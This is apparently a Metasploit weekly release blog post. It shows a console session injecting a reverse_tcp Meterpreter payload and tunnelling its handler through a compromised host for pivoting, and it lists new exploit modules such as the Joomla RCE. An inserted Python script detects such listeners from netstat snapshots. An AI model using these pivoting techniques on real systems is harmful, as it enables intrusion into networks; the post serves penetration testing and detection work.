Aaaaaand we're back! Last week was the first weekly update of the year and it comes with some super fun stuff.
The latest update allows you to tunnel reverse_tcp sessions over a compromised machine in a slightly less painful way. There is now a new datastore option, ReverseListenerComm, which lets you tell a Meterpreter session to tunnel connections back to your payload handler. Here's an example run to give you the idea:
```
msf exploit(payload_inject) > show options

Module options (exploit/windows/local/payload_inject):

   Name        Current Setting  Required  Description
   ----        ---------------  --------  -----------
   NEWPROCESS  true             no        New notepad.exe to inject to
   PID                          no        Process Identifier to inject of process to inject payload.
   SESSION                      yes       The session to run this module on.

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (accepted: , , seh, thread, process, none)
   LHOST     127.0.0.1        yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf exploit(payload_inject) > set ReverseListenerComm 1
ReverseListenerComm => 1
msf exploit(payload_inject) > set SESSION 1
SESSION => 1
msf exploit(payload_inject) > run

[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
[*] Running module against WIN-2DE8F2QP867
[*] Launching notepad.exe...
[*] Preparing 'windows/meterpreter/reverse_tcp' for PID 3092
[*] Sending stage (884270 bytes)
[*] Meterpreter session 2 opened (192.168.5.101-192.168.5.1:4444 -> 127.0.0.1:63173) at 2015-05-20 00:09:44 +0100

meterpreter >
```
The really important line there is this:
[*] Started reverse handler on 127.0.0.1:4444 via the meterpreter on session 1
The compromised machine is listening on its localhost for the new connection, but it doesn't have to be localhost: you can tell it to listen on an external address and use psexec against a second internal machine. This used to be possible by creating a route and setting your LHOST to a victim machine's IP address within that route, but it wasn't really clear how to do it and the settings were quite error prone; now it's just a single option to tell Metasploit explicitly where to listen for the payload.
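The flip side of that convenience is what it looks like from the compromised host: the reverse handler is a brand-new listening socket opened by an already-running process, on loopback or on an external interface. The script below is an added example (not code from the Metasploit project or this post) showing how a responder can spot that by diffing two `netstat -ano` snapshots from a Windows host. The snapshot text and PIDs are constructed for illustration; the only page-derived detail is the 4444 listener.

```python
"""Diff two `netstat -ano` snapshots and report new TCP listeners.

Added example, not from the Metasploit wrap-up. A pivot handler bound on a
compromised host (loopback or an external interface) shows up as a new
LISTENING row owned by a process that was not listening before.
"""
import re
from dataclasses import dataclass

# Matches the TCP rows of Windows `netstat -ano` output; UDP rows have no
# State column and are ignored here.
_TCP_ROW = re.compile(
    r"^\s*TCP\s+(?P<local>\S+)\s+(?P<remote>\S+)\s+(?P<state>\S+)\s+(?P<pid>\d+)\s*$"
)


@dataclass(frozen=True)
class Listener:
    addr: str
    port: int
    pid: int


def parse_listeners(netstat_text: str) -> set[Listener]:
    """Return the set of (addr, port, pid) triples in LISTENING state."""
    found = set()
    for line in netstat_text.splitlines():
        m = _TCP_ROW.match(line)
        if not m or m.group("state") != "LISTENING":
            continue
        # rsplit keeps IPv6 forms such as "[::]:135" intact.
        addr, port = m.group("local").rsplit(":", 1)
        found.add(Listener(addr, int(port), int(m.group("pid"))))
    return found


def new_listeners(baseline_text: str, current_text: str) -> set[Listener]:
    """Listeners present in the current snapshot but absent from the baseline."""
    return parse_listeners(current_text) - parse_listeners(baseline_text)


def exposure(listener: Listener) -> str:
    """Classify where the socket is reachable from, the distinction the post draws."""
    if listener.addr in ("127.0.0.1", "[::1]"):
        return "loopback"
    if listener.addr in ("0.0.0.0", "[::]"):
        return "all interfaces"
    return "single interface"


# Constructed snapshots: a baseline taken earlier and one taken after a
# handler was started on the host. PIDs and addresses are made up.
BASELINE = """
Active Connections

  Proto  Local Address          Foreign Address        State           PID
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING       788
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING       4
  TCP    192.168.5.101:49152    192.168.5.1:443        ESTABLISHED     2204
  UDP    0.0.0.0:123            *:*                                    1012
"""

CURRENT = BASELINE + """
  TCP    127.0.0.1:4444         0.0.0.0:0              LISTENING       2204
  TCP    127.0.0.1:63173        127.0.0.1:4444         ESTABLISHED     3356
"""


def report(baseline_text: str, current_text: str) -> list[str]:
    """Human-readable lines, one per new listener, sorted for stable output."""
    lines = []
    for l in sorted(new_listeners(baseline_text, current_text),
                    key=lambda x: (x.pid, x.port)):
        lines.append(f"new listener {l.addr}:{l.port} pid={l.pid} ({exposure(l)})")
    return lines


if __name__ == "__main__":
    for line in report(BASELINE, CURRENT):
        print(line)
```

The diff deliberately keys on address, port and PID together: a process that already owned an established session but suddenly also owns a LISTENING socket is exactly the pattern the `ReverseListenerComm` handler produces, and it is the same pattern you would chase when the listener is bound to an external interface for a psexec pivot.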
Super fun modules
This update comes with a pre-authentication exploit for Joomla, the popular CMS, another in a rich and storied history of deserialization bugs. We've also abstracted some common things into a Joomla mixin, so the next time one of these comes along, writing the exploit will be faster and easier.
From the description of the new NTP module:
The end goal is to cause ntpd to declare the legitimate peers "false tickers" and choose the attacking clients as the preferred peers, allowing these peers to control time.
Now you, too, can go... NAK to the Future!
- Joomla HTTP Header Unauthenticated Remote Code Execution by Christian Mehlmauer and Marc-Alexandre Montpas exploits CVE-2015-8562
Auxiliary and post modules
- Android Stock Browser Iframe DOS by Jean Pascal Pereira and Jonathan Waggoner exploits CVE-2012-6301
- NTP "NAK to the Future" by Jon Hart and Matthew Van Gundy of Cisco ASIG exploits CVE-2015-7871
- Redis File Upload by Jon Hart and Nixawk
- MS15-134 Microsoft Windows Media Center MCL Information Disclosure by sinn3r and Francisco Falcon exploits CVE-2015-6127
- Post Windows Gather NTDS.DIT Location by Stuart Morgan
As always, you can get all these modules and improvements with a simple msfupdate, and the full diff is available on GitHub: 4.11.5-2015121501...4.11.5-2016010401